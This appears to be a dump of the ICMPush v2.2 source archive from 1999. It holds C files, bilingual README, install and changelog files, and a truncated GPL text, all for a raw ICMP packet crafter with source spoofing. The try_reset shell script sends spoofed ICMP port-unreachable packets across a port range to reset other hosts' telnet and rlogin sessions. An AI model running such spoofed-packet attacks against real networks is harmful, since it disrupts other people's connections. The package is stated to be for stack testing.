icmpush-2.2.orig/0040755000175000017500000000000006664366514012130 5ustar domdomicmpush-2.2.orig/cuenta.c0100644000175000017500000000113306653454353013543 0ustar domdom/*****************************************/ /* Nasty program to generate numbers. :) */ /*****************************************/ #include #include void main(int argc, char *argv[]) { register int i; int final, princ; if (argc == 3) { princ = atoi(argv[1]); final = atoi(argv[2]); if ( princ <= final ) { for ( i = princ; i <= final; i++ ) printf("%d ", i); return; } } #ifdef SPANISH printf("Uso: %s num.inicio num.final\n", argv[0]); #else printf("Use: %s begin# end#\n", argv[0]); #endif } icmpush-2.2.orig/help.c0100644000175000017500000001077706662512200013214 0ustar domdom/**********************************************/ /* This is only the help part of the program. */ /* See the man page for further details. */ /**********************************************/ #include extern char *prog; void help(void) { #ifdef SPANISH fprintf(stdout," Uso: %s tipo [opciones] host\n",prog); fprintf(stdout,"Tipo:\n"); fprintf(stdout," -du Destination Unreach -echo Echo Request\n"); fprintf(stdout," -info Information Request -mask Address Mask Request\n"); fprintf(stdout," -rta Router Advertisement -rts Router Solicitation\n"); fprintf(stdout," -red Redirect -sq Source Quench\n"); fprintf(stdout," -tstamp Timestamp -tx Time Exceeded\n"); fprintf(stdout," -param Parameter Problem\n"); fprintf(stdout," -v Modo informativo -vv Modo debug\n"); fprintf(stdout," -h Pantalla de ayuda -V Versión del programa\n\n"); fprintf(stdout,"Opciones:\n"); fprintf(stdout," -sp address Host a usar como spoof.\n"); fprintf(stdout," -to secs Timeout en segundos para leer las respuestas.\n"); fprintf(stdout," -n No usar resolución DNS de hosts.\n"); fprintf(stdout," -lt secs Lifetime en segundos de Router Advertisement.\n"); fprintf(stdout," -gw address Host gateway de ruta en un ICMP Redirect.\n"); fprintf(stdout," -dest address Host destino de ruta en un ICMP Redirect.\n"); fprintf(stdout," -orig address Host original en un ICMP error.\n"); fprintf(stdout," -psrc port Puerto origen (tcp/udp) a usar en datos de ICMP error.\n"); fprintf(stdout," -pdst port Puerto destino (tcp/udp) a usar en datos de ICMP error.\n"); fprintf(stdout," -prot Protocolo a usar en datos de ICMP error (tcp|udp|icmp).\n"); fprintf(stdout," -id ident Identificador en ICMPs de información.\n"); fprintf(stdout," -seq seq# Número de secuencia en ICMPs de información.\n"); fprintf(stdout," -pat patron Patrón de datos a enviar en un ICMP Echo Request.\n"); fprintf(stdout," -gbg bytes|max Cantidad de bytes basura a enviar o máximo(max).\n"); fprintf(stdout," -ptr byte Puntero a byte erróneo en ICMP Parameter Problem.\n"); fprintf(stdout," -c cod|num|max Código de ICMP. Mirar página man para más detalles.\n\n"); #else fprintf(stdout," Usage: %s type [options] host\n",prog); fprintf(stdout,"Type:\n"); fprintf(stdout," -du Destination Unreach -echo Echo Request\n"); fprintf(stdout," -info Information Request -mask Address Mask Request\n"); fprintf(stdout," -rta Router Advertisement -rts Router Solicitation\n"); fprintf(stdout," -red Redirect -sq Source Quench\n"); fprintf(stdout," -tstamp Timestamp -tx Time Exceeded\n"); fprintf(stdout," -param Parameter Problem\n"); fprintf(stdout," -v Verbose mode on -vv Debug mode on\n"); fprintf(stdout," -h This help screen -V Program version\n\n"); fprintf(stdout,"Options:\n"); fprintf(stdout," -sp address Spoof host.\n"); fprintf(stdout," -to secs Timeout secs to read the replies.\n"); fprintf(stdout," -n Don't use name resolution.\n"); fprintf(stdout," -lt secs Lifetime secs for an ICMP Router Advertisement.\n"); fprintf(stdout," -gw address Route gateway host for an ICMP Redirect.\n"); fprintf(stdout," -dest address Route destination host for an ICMP Redirect.\n"); fprintf(stdout," -orig address Original host for an ICMP error.\n"); fprintf(stdout," -psrc port Source port (tcp/udp) of ICMP error data.\n"); fprintf(stdout," -pdst port Destination port (tcp/udp) of ICMP error data.\n"); fprintf(stdout," -prot ICMP error data protocol ( tcp | udp | icmp ).\n"); fprintf(stdout," -id ident Identification for an ICMP information message.\n"); fprintf(stdout," -seq seq# Sequence number for an ICMP information message.\n"); fprintf(stdout," -pat pattern Data pattern to send within an ICMP Echo Request.\n"); fprintf(stdout," -gbg bytes|max Number of garbage data bytes to send or maximum(max).\n"); fprintf(stdout," -ptr byte Incorrect byte on an ICMP Parameter Problem.\n"); fprintf(stdout," -c code|num|max ICMP code. See the man page for details.\n\n"); #endif exit(0); } icmpush-2.2.orig/mtu.c0100644000175000017500000001535606662420116013073 0ustar domdom/***********************************************************/ /* Functions to determine the MTU value from a network */ /* interface and the IP address from an outgoing interface */ /***********************************************************/ /* To solve: */ /* - Under Solaris 2.5.1 it's not possible to get the */ /* outgoing interface without reading the routing table, */ /* get the interface name and get the netmask from */ /* /etc/netmasks. This implies (among other things) the */ /* use of STREAMS with the /dev/ip device ... */ /* Maybe some day ;) */ /***********************************************************/ #include #include #include #include #ifdef SOLARIS #include #endif #include #include #include #include #include #include #include "mtu.h" #include "misc.h" #ifdef SOLARIS extern char *sys_errlist[]; #endif extern u_short more_verbose; /****************************/ /* Functions prototypes ... */ /****************************/ int get_mtu( struct sockaddr_in * ); int get_iface_out( struct sockaddr_in *, struct sockaddr_in * ); int get_iface_mtu( struct sockaddr * ); int coloca_interfaz( int, char *, struct mi_ifaz * ); int equal( struct sockaddr_in *, struct sockaddr_in * ); extern char *pasa( struct sockaddr_in * ); /*******************************/ /* ...end functions prototypes */ /*******************************/ int get_mtu( struct sockaddr_in *ip2see ) { struct sockaddr ip_aux; if ( get_iface_out( ip2see, (struct sockaddr_in *)&ip_aux ) ) return MTU_DFL; return ( get_iface_mtu( &ip_aux ) ); } /**********************************/ /* Try to get the IP address from */ /* the outgoing interface "ala" */ /* Stevens way. ;) */ /**********************************/ int get_iface_out( struct sockaddr_in *ip2see, struct sockaddr_in *aux ) { int sock_rt, len, on=1; struct sockaddr_in iface_out; iniciamem( (char *)&iface_out, sizeof(struct sockaddr_in)); sock_rt = socket(AF_INET, SOCK_DGRAM, 0 ); if ( setsockopt( sock_rt, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on) ) == -1 ) { if ( more_verbose ) fprintf(stderr, "setsockopt -> %s\n", sys_errlist[errno] ); return 1; } if (connect(sock_rt, (struct sockaddr *)ip2see, sizeof(struct sockaddr_in) ) == -1 ) { if ( more_verbose ) fprintf( stderr,"connect -> %s\n", sys_errlist[errno] ); return 1; } len = sizeof(iface_out); if ( getsockname( sock_rt, (struct sockaddr *)&iface_out, &len ) == -1 ) { if ( more_verbose ) fprintf(stderr,"getsockname -> %s\n", sys_errlist[errno] ); return 1; } close(sock_rt); if ( more_verbose ) #ifdef SPANISH fprintf(stdout," -> Interfaz de salida = %s\n", pasa((struct sockaddr_in *)&iface_out)); #else fprintf(stdout," -> Outgoing interface = %s\n", pasa((struct sockaddr_in *)&iface_out)); #endif if ( !iface_out.sin_addr.s_addr ) return 1; copymem( (char *)&iface_out, (char *)aux, sizeof(struct sockaddr_in)); return 0; } /***********************************************/ /* Returns the MTU from a networking interface */ /* searching for the appropriate interface */ /* on the interfaces kernel list. */ /* On error returns the default MTU (See */ /* mtu.h) */ /***********************************************/ int get_iface_mtu( struct sockaddr *ip2see ) { struct ifconf ifc; struct ifreq *ifaz; struct mi_ifaz mi_interfaz; char buffer[1024]; int i, sock_disp; if ( (sock_disp = socket(AF_INET, SOCK_DGRAM, 0) ) < 0) { if ( more_verbose ) fprintf(stderr, "When trying socket() to kernel -> %s", sys_errlist[errno]); return MTU_DFL; } ifc.ifc_len = sizeof(buffer); ifc.ifc_buf = buffer; if (ioctl( sock_disp, SIOCGIFCONF, &ifc) < 0) { if ( more_verbose ) fprintf(stderr, "SIOCGIFCONF -> %s", sys_errlist[errno]); return MTU_DFL; } ifaz = ifc.ifc_req; for ( i = ifc.ifc_len / sizeof(struct ifreq) ; --i >= 0 ; ifaz++ ) { iniciamem( (char *)&mi_interfaz, sizeof(struct mi_ifaz)); if ( coloca_interfaz( sock_disp, ifaz->ifr_name, &mi_interfaz ) ) continue; if ( ( mi_interfaz.ifaz_flags & IFF_UP ) && ( equal( (struct sockaddr_in *)&mi_interfaz.ifaz_ip, (struct sockaddr_in *)ip2see ) ) ) { close(sock_disp); return mi_interfaz.ifaz_mtu; } } close(sock_disp); return MTU_DFL; } /*******************************************/ /* Copy the values from the interface */ /* "nombre" to "mi_interfaz" struct */ /*******************************************/ /* Arguments : */ /* - sock_disp : Socket RAW descriptor */ /* with the kernel. */ /* - nombre : Interface name. */ /* - mi_interfaz : Struct where to put */ /* the interface values. */ /*******************************************/ /* Return : 1 on error, or 0 else other. */ /*******************************************/ int coloca_interfaz( int sock_disp, char *nombre, struct mi_ifaz *mi_interfaz ) { struct ifreq if_aux; /* Estructura "auxiliar" :) */ strcpy(mi_interfaz->ifaz_nombre, nombre); strcpy(if_aux.ifr_name, nombre); if (ioctl( sock_disp, SIOCGIFADDR, &if_aux) < 0) { if ( more_verbose ) fprintf(stderr,"SIOCGIFADDR -> %s\n", sys_errlist[errno]); return 1; } mi_interfaz->ifaz_ip = if_aux.ifr_addr; strcpy(if_aux.ifr_name, nombre); if (ioctl(sock_disp, SIOCGIFMTU, &if_aux) < 0) { if ( more_verbose ) fprintf(stderr,"SIOCGIFMTU -> %s\n", sys_errlist[errno]); return 1; } #ifdef LINUX mi_interfaz->ifaz_mtu = if_aux.ifr_mtu; #else mi_interfaz->ifaz_mtu = if_aux.ifr_metric; #endif strcpy(if_aux.ifr_name, nombre); if ( ioctl( sock_disp, SIOCGIFFLAGS, &if_aux ) < 0 ) { if ( more_verbose ) fprintf(stderr,"SIOCGIFFLAGS -> %s\n", sys_errlist[errno]); return 1; } mi_interfaz->ifaz_flags = if_aux.ifr_flags; return 0; } /*****************************/ /* Compares 2 sockaddr_in */ /*****************************/ /* Returns 1 if eq */ /* Returns 0 else other */ /* Don't care about the port */ /*****************************/ int equal( struct sockaddr_in *if_ip, struct sockaddr_in *ip2see ) { if ( if_ip->sin_family != ip2see->sin_family ) return 0; if ( if_ip->sin_addr.s_addr != ip2see->sin_addr.s_addr ) return 0; return 1; } icmpush-2.2.orig/INSTALL0100644000175000017500000000130606662156150013145 0ustar domdomINSTALL for ICMPush v2.2 ======================== Before all, login as root and ... 1.- Compilation: Take a look into the Makefile and after: make linuz or make solaris If you get the message "undefined reference to __inet_aton" you have the library that comes with bind 8.1.2. To link correctly you must put the complete path to the library in the LIBBINDDIR Makefile variable. 2.- Installation: By default the program installs itself into /usr/local/bin, you can change it with the Makefile variable INST_DIR. The man page installs into /usr/local/man/man8, you can change it with the Makefile variable MAN_DIR. make install Byez. icmpush-2.2.orig/LEEME0100644000175000017500000001133506660336007012670 0ustar domdomLEEME para ICMPush v2.2 ======================= "Este programa se distribuye bajo licencia GNU GPL, consultar el fichero COPYING para más detalles" Hace unos 4 o 5 años decidí hacer un programa que generara ICMP redirects para probar la estabilidad de las tablas de rutas de mis HP-UX de la época (HP-UX 9.0 :D) de ahí nació el redirect.c un cutre-programa (como todos los mios) que enviaba ICMP redirects. Obviamente este programa se hizo solo para Linuz (ruuuuuulezzzzzz!!) pasando posteriormente a soportar también envío de ICMPs Source Quench, Time Exceeded y Destination Unreach. Bueno, al grano, estos últimos años solo fui modificando pijadillas del programa, añadiendo nuevos códigos de Unreach y cosas así, pero en esta nueva versión se permite el envío de paquetes ICMP de petición de información: Address Mask Request, Info Request, Timestamp Request, Router Solicitation (Router Discovery), Router Advertisement(Router Discovery) y Echo Request e indicar el timeout en segundos para la lectura de las respuestas. Tal vez pueda parecer farragoso tantos argumentos, pero para que una implementación TCP/IP se trague un ICMP en condiciones este debe cumplir ciertas características que intento sean suministradas desde línea de comandos. Mención aparte merecen los resultados de los redirects contra los F20 de HP rulando HP-UX 9.0 por que el problema no era que se los tragara y modificara dinámicamente la tabla de rutas sino que le daba igual que gateway pusieras en la ruta (que perteneciera a su subred o no) con lo cual podrías crear auténticos ataques catastróficos. Pero bueno, aquí está el programa y cada uno sabrá si le interesa o no. Aquí os indico las abreviaturas que se usan en el programa para identificar en la linea de comandos a los tipos de ICMP que acepta el programa: Valor Valor extend. Significado ------ ------------- ----------- -echo --echo_req Echo Request. -du --dest_unreach Destination Unreach. -info --info_req Information Request. -red --redirect Redirect. -mask --mask_req Address Mask Request. -param --param-problem Parameter Problem. -rts --router_solicit Router Solicitation (Router Discovery). -rta --router_advert Router Advertisement (Router Discovery). -sq --src_quench Source Quench. -tstamp --timestamp Timestamp. -tx --time_exc Time Exceeded. Mira la página man para ejemplos en detalle. A continuación os indico los valores de retorno que devuelve el programa ICMPush y el significado de los mismos para que podáis utilizarlo en cualquier shell-script: Valor Significado ----- ----------- 0 Programa finalizado OK 1 Numero de argumentos incorrecto 2 Protocolo ICMP desconocido 3 No puedo crear socket tipo RAW 4 Tipo de paquete ICMP incorrecto 5 Gateway incorrecto 6 Destino de ruta incorrecto 7 Código de paquete ICMP incorrecto 8 Host original incorrecto 9 Error enviando paquete 10 Protocolo todavía no implementado 11 Dirección IP o host de spoof incorrecto 12 No pude reservar memoria para unión data_hdr 13 Dirección IP o host destino incorrecto 14 Protocolo desconocido 16 Error leyendo socket RAW 17 Error al iniciar manejador de señal SIGALRM 18 Los datos que se quieren enviar en el paquete Echo Request son demasiado grandes 19 Puerto origen incorrecto 20 Puerto destino incorrecto 21 Valor de timeout incorrecto 22 Echo ID incorrecto 23 Numero de secuencia incorrecto 24 Datos de Echo incorrectos 25 Error en IP_HDRINCL 26 Dirección de router en paquete Router Advertisement incorrecta 27 Numero de bytes basura incorrecto 28 Puntero de ICMP Parameter Problem es incorrecto. También os dejo un mini-cutre-script llamado try_reset para intentar tirar conexiones telnet y rlogin, también podéis ver el uso de los valores de retorno del programa ICMPush para que os hagáis una idea, pero os aviso que es una gilipollez. Ya esta probado el uso del Router Solicitation (Router Discovery) gentileza de Infovía Plus ;) y rula OK. --------------------------------------------------------------------------- IMPORTANTE: Este programa está concebido para testear la red o hosts de uno mismo a fin de mejorar la seguridad; de hecho yo lo hago a menudo con mi red, pero *NO* está hecho para un uso ilegal o peligroso del mismo. Esto puede constituir un delito en ciertos países del que, por supuesto, no me hago responsable. --------------------------------------------------------------------------- Por lo demás, me gusta que la gente me escriba dando sus opiniones sobre el programa (tanto buenas como malas) o sobre la vida misma. ;-) Mi dirección es: tcpbgp@softhome.net ¡Que lo disfrutéis! Madrid, 1999. Slayer. icmpush-2.2.orig/INSTALAR0100644000175000017500000000211406664366513013262 0ustar domdomINSTALAR para ICMPush v2.2 ========================== Lo primero es entrar como root y después ... 1.- Compilación: Échale un vistazo al fichero Makefile, si quieres que los mensajes del programa vengan en español descomenta la variable LNG. Después puedes ejecutar: make linuz o make solaris Si te da problemas de "undefined reference to __inet_aton" es que tienes los includes de la libreria del bind 8.1.2. Para que te enlace correctamente deberás indicar el camino completo hacia ella en la variable LIBBINDDIR del fichero Makefile. 2.- Instalación: Por defecto se instala en /usr/local/bin, si lo quieres cambiar hazlo en el fichero Makefile cambiando la variable INST_DIR. La página man que se instala por defecto es la inglesa y lo hace en /usr/local/man/man8, si quieres usar la página man española se encuentra en el fichero icmpush.es.8, si lo que quieres es cambiar el directorio de instalación por defecto cambia la variable MAN_DIR en el el fichero Makefile. Después ejecuta: make install Saludos. icmpush-2.2.orig/README0100644000175000017500000000732406662156370013006 0ustar domdomREADME for ICMPush v2.2 ======================= "This program is distributed under the GNU GPL license. See the COPYING file for more details." Ok, there's the ICMPush program, the first version was produced 4 (more or less) years ago and was called originally redirect.c (not the redirect.c sent long time ago to rootshell) and only supported ICMP redirect type. Now, the ICMP error types: Unreach, Parameter Problem, Redirect and Source Quench are allowed, and the ICMP information types: Timestamp, Address Mask Request, Information Request, Router Solicitation (Router Discovery), Router Advertisement (Router Discovery) and Echo Request are also allowed and can wait a timeout to print the replies received. Each one knows if it interest for you or not. :) Below there are the keys for the ICMP packet types accepted on the command line: Value Extended Value Meaning ----- -------------- ------- -echo --echo_req Echo Request. -du --dest_unreach Destination Unreach. -info --info_req Information Request. -red --redirect Redirect. -mask --mask_req Address Mask Request. -param --param_problem Parameter Problem. -rts --router_solicit Router Solicitation (Router Discovery). -rta --router_advert Router Advertisement (Router Discovery). -sq --src_quench Source Quench. -tstamp --timestamp Timestamp. -tx --time_exc Time Exceeded. This keys can be combined with multiple options like ICMP code (-c code), timeout (-to seconds), no resolve (-n), garbage bytes (-gbg bytes|max), etc. See the man page for examples with great detail. Below there are the values returned from the ICMPush program to the system and their meaning, you can use them within a shell-script: Value Meaning ----- ------- 0 Program finished OK 1 Wrong number of arguments 2 Unknown ICMP protocol 3 Can't build RAW sockets 4 Incorrect ICMP packet type 5 Wrong gateway 6 Incorrect route destination 7 Incorrect ICMP packet code 8 Wrong original host 9 Error while sending packet 10 Protocol still not implemented 11 Wrong spoof IP or hostname 12 Can't allocate union data_hdr memory 13 Wrong destination IP or hostname 14 Unknown protocol 16 Error while reading RAW socket 17 Error while initializing SIGALRM signal handler 18 The Echo Request data pattern len is too big 19 Incorrect source port value 20 Incorrect destination port value 21 Incorrect timeout value 22 Incorrect Echo ID value 23 Incorrect sequence number 24 Incorrect Echo data value 25 IP_HDRINCL error 26 Incorrect router address of a ICMP Advertisement packet 27 Incorrect or missing garbage data bytes 28 Incorrect pointer of ICMP Parameter Problem I attach also a nasty mini-script called try_reset that tries to reset existing telnet or rlogin connections, you can see the use of the values returned from the ICMPush program within a shell-script. But I advise you: its a bad script. :) The use of Router Solicitation (Router Discovery) has been finished and it seems to work ok. Tnx to Infovia Plus. ;) ----------------------------------------------------------------------- IMPORTANT: I released this program for evaluation of TCP/IP stacks *ONLY*. Take it like a little tool to improve your system security, not for cracking, disturbing or flooding another systems. This can be a crime on certain countries. ----------------------------------------------------------------------- I like to read your opinions, suggestions, bugs etc. about this program. My e-mail address is: tcpbgp@softhome.net Feel free to contact. :) Enjoy! Ooooooops! The last thing ... sorry for my bad english! :) Madrid, 1999. Slayer. icmpush-2.2.orig/try_reset0100700000175000017500000000342406662156105014053 0ustar domdom#!/bin/sh # # Nasty script to send ICMP packets that verifies the returned # values from the ICMPush program :) # In this case to reset an existing rlogin or telnet connection. # # Example: # # ./try_reset LDG01 10.76.37.37 1200 2500 # # This example send ICMP Unreach packets with source of LDG01 to 10.76.37.37 # saying that the ports from 1200 to 2500 of LDG01 are unreachables. # This could make that the host 10.76.37.37 reset the connection of his # telnet port(23) or rlogin port(513) with the host LDG01 range port 1200-2500 # Of course, the reset of an existing TCP connection caused by an ICMP # Unreach depends on the implementation of the TCP/IP stack of the host that # receives the ICMP. # # if [ "$#" = 4 ]; then for i in `cuenta $3 $4` do icmpush -du -sp $1 -c port-unreach -prot tcp -psrc 23 -pdst $i $2 1> /dev/null 2>&1 case $? in 0) echo "ICMP packet sent to host $2" ;; 2) echo "ICMP protocol not exists in /etc/protocols" ; exit ;; 11) echo "Spoof host $1 incorrect (name or IP address)" ; exit ;; 13) echo "Destination host $2 incorrect (name or IP address)" ; exit ;; *) echo "Error while trying to send an ICMP packet to host $2" ;; esac icmp -du -sp $1 -c port-unreach -prot tcp -psrc 513 -pdst $i $2 1> /dev/null 2>&1 case $? in 0) echo "ICMP packet sent to host $2" ;; 2) echo "ICMP protocol not exists in /etc/protocols" ; exit ;; 11) echo "Spoof host $1 incorrect (name or IP address)" ; exit ;; 13) echo "Destination host $2 incorrect (name or IP address)" ; exit ;; *) echo "Error while trying to send an ICMP packet to host $2" ;; esac done else echo "Use: $0 source_host destination_host begin_port end_port" exit; fi icmpush-2.2.orig/CHANGES0100644000175000017500000000425406664230575013122 0ustar domdomCHANGES for ICMPush v2.2 ======================== v2.2: - Changed the name from ICMP to ICMPush. - Size of pattern data grow up to 64k (or more on Linuz). Fragmentation made by the program itself on Linuz. - IP_HDRINCL supported. Use only a socket. - Random sequence number of Information packets. - Support for Router Advertisement to test routers. Can send multiple routers addresses with their own preference on 1 Advertisement packet. - Cleaned up the code. A parser function with multiple options and a more friendly user interface. - Resolving hosts to names is now optional (-n). - Changed the compile option -DEBUG to a runtime option (-vv). - Support for bytes of data garbage to test icmp/ip implementations. Option = '-gbg bytes|max'. - Support for another ICMP error type: Parameter Problem. - Max code support for the ICMP types that have codes (Redirect, Unreach and Time Exceeded). This sends an ICMP code greater than the standard codes. Option= '-c max'. - Numeric codes support for the ICMP types that *DOESN'T* support codes (Echo Request, Source Quench, Timestamp Request, Parameter problem, Router Advertisement, Router Solicitation, Info Request and Address Mask Request). This sends an ICMP packet with the code equal to the number parsed from the command line. Option = '-c number'. - Finally we have a man page. Thx to wait_man (wait_man@apostols.org) and for the english translation to binaria (binaria@totalcoredump.org) kisses! :DD. v2.11: - GNU GPL license distribution. - The Router Discovery support has been tested and works ok. - Support for data pattern into an ECHO REQUEST type. Idea by Sean (fa-q@infomind.net). Option = '-pat pattern'. v2.1: - Added support for transmit/receive ICMP Echo Request/Echo Reply. - Cleared the broadcast setsockopt error. v2.06: - Added support for ICMP Address Mask Request, Information Request, Timestamp and Router Solicitation (Router Discovery). Can read the replies via RAW socket. Can put a timeout replies on command line. (default is 5 secs). - Added support on compat.h for BIG ENDIAN systems in the IP header and support for Router Discovery structures. - Various minor changes. Slayer, Madrid, 1999. icmpush-2.2.orig/CAMBIOS0100644000175000017500000000501206664230617013115 0ustar domdomCAMBIOS para ICMPush v2.2 ========================= v2.2: - Se cambia el nombre del programa de ICMP a ICMPush. - Código revisado y modificado: Se ha incluido una función parser decente y se ha variado totalmente el interfaz con el usuario para que sea más amigable. - La resolución de nombres es ahora opcional (-n). - La opción de compilación -DEBUG es ahora una opción en tiempo de ejecución (-vv). - Se añade número de secuencia aleatorio en paquetes de información. - Soporte de IP_HDRINCL. Sólo se usa un socket. - El tamaño del patrón de datos puede llegar a 64k (o más en Linux). Fragmentación realizada por el propio programa en Linux. - Soporte de envío de Router Advertisements para testeo de routers con opción de envío de varios routers con su preferencia en el mismo paquete. - Soporte de una opción nueva de envío de bytes basura unidos al paquete icmp para testeo de implementaciones icmp/ip. Opción = '-gbg bytes|max'. - Soporte de otro tipo de error ICMP: Parameter Problem. - Soporte para envío de código ICMP máximo para los tipos de ICMP que soportan códigos (Redirect, Unreach y Time Exceeded). Esto envía un código mayor que los códigos normalizados. Opción = '-c max'. - Soporte de código numérico para aquellos tipos de ICMP que no soportan códigos (Echo Request, Information Request, Address Mask Request, Router Solicitation, Router Advertisement, Source Quench, Parameter Problem y Timestamp). Esto envía un código igual al numero introducido en linea de comandos. Opción = '-c numero'. - Por fin hay una página man gentileza de wait_man (wait_man@apostols.org) con traducción al inglés de binaria (binaria@totalcoredump.org) besos :). v2.11: - Distribución bajo licencia GNU GPL. - El soporte de Router Discovery ya está probado y funcionando. - Soporte de patrón de datos en paquetes ECHO REQUEST. Idea de Sean (fa-q@infomind.net). Opción = '-pat patron'. v2.1: - Soporte para envío/recepción de Echo Request y Echo Reply. - Arreglado el error del soporte de Broadcast, me equivoqué y lo aplicaba al socket de lectura en vez de al de escritura! :DDDDDD v2.06: - Se ha añadido soporte para los tipos Address Mask Request, Information Request, Timestamp y Router Solicitation (Router Discovery). Se leen las respuestas vía RAW socket y se puede especificar el timeout para recibirlas en línea de comandos (por defecto son 5 segundos). - Se ha añadido soporte en compat.h para sistemas BIG ENDIAN en la cabecera IP y estructuras para Router Discovery. - Varios cambios menores. Slayer, Madrid, 1999. icmpush-2.2.orig/COPYING0100644000175000017500000004307606633534453013165 0ustar domdom GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc. 675 Mass Ave, Cambridge, MA 02139, USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Library General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute 